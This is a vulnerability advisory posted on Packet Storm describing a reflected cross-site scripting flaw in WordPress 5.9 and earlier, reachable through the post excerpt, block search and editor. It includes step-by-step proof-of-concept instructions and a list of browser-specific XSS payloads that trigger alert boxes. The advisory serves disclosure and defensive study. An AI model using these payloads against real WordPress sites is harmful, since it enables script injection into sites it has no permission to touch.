what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress 5.9 Cross Site Scripting

WordPress 5.9 Cross Site Scripting
Posted Feb 10, 2022
Authored by Taurus Omar

WordPress versions 5.9 and below suffer from a cross site scripting vulnerability in the author and contributor roles. Per the researcher, WordPress is addressing this in their next release and considers this a medium severity vulnerability.

tags | exploit, xss
SHA-256 | eb036d4467921c95f77944d1565e15824ae56f7f501944425c1be75fb150f82d

WordPress 5.9 Cross Site Scripting

Change Mirror Download
Document Title:
===============
Wordpress <= 5.9 Cross-Site Scripting Reflected (Authenticated)


Credits & Authors:
==================
Taurus Omar [taurusomar13@gmail.com]


Disclosure Type:
================
Independent Security Research


Release Date:
=============
2022-31-01


Vulnerability Disclosure Timeline:
==================================
2022-05-02: Public Disclosure


Vulnerability CVE
===================
Pending (CVE-xxxxx)


Vulnerability Class:
====================
Cross Site Scripting - Reflected


Product & Service Introduction:
===============================
WordPress (WP, WordPress.org) is a free and open-source content
management system (CMS) written in PHP[4] and paired with a MySQL or
MariaDB database. Features include a plugin architecture and a template
system, referred to within WordPress as Themes. WordPress was
originally
created as a blog-publishing system but has evolved to support other
web
content types including more traditional mailing lists and forums,
media
galleries, membership sites, learning management systems (LMS) and
online
stores. One of the most popular content management system solutions in
use,
WordPress is used by 42.8% of the top 10 million websites as of October
2021.


Vendor HomePage
===============================
https://wordpress.org/download/


Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered a reflected cross
site web vulnerability in wordpress framwork.


Affected Product(s):
====================
All wordpress version <= 5.9


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Proof of Concept (PoC):
=======================
Reflected XSS is done when a user with the AUTHOR or CONTRIBUTOR role
adds a javascript payload in the Post's Excerpt function, whenever a
user wants to use the Add Block function in their post or page, the XSS
will be executed. Also the post and page editor allows executing the xss payload
directly just by copying and pasting the malicious javascript.

## POC1:The malicious Excerpt will be executed in the post and page
sections at the moment you want to use the add new block function and
typing some name in the search engine of the add block function
reflecting it in all the wordpress editor sections.

1.) Login whit user author or contributor
2.) Add new post
3.) Add Block Post Excerpt
4.) Add malicious code in the Extract function (<object data="javascript:alert(0)">)
5.) Replicated

## POC2 IN BLOCK FUCTION
1.) Login whit user author
2.) Add new post
3.) Publish Post
4.) Add malicious code in the Extract function (<object data="javascript:alert(0)">)
5.) In the post editor add a new block
6.) Search for something in the block search engine7.) Replicated

## POC3: XSS IN POST & PAGE EDITOR
1.) Login whit user author or contributor
2.) Add new post
3.) Copy & Page (<object data="javascript:alert(0)">) in editor4.)
4.) Replicated


## Firefox Payload:
<object data="javascript:alert('xss')">
<object data=/ onload=alert(1)>
<iframe src="javascript:alert(1)">

## Chrome Payload:
<form><button formaction=javascript:alert(1)>XSS
<iframe src="javascript:alert(1)">
<form action=javascript:alert(1)><input type=submit value=XSS>

## Poc Image:
https://i.imgur.com/WiaEUEE.png
https://i.imgur.com/voJptm0.png

## Poc Video
https://www.youtube.com/watch?v=UEgEMADeOC8


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a encode and secure parse / escape
of the inputs. In a second step the output location were the execute occurs needs
to be sanitized.


## Impact
Cross-Site Scripting, XSS will be executed, since in all the sections
where the editor and search engine of the add block function can be
used as well as in the post and page section of the editor with the copy and
paste function.


#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    8 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close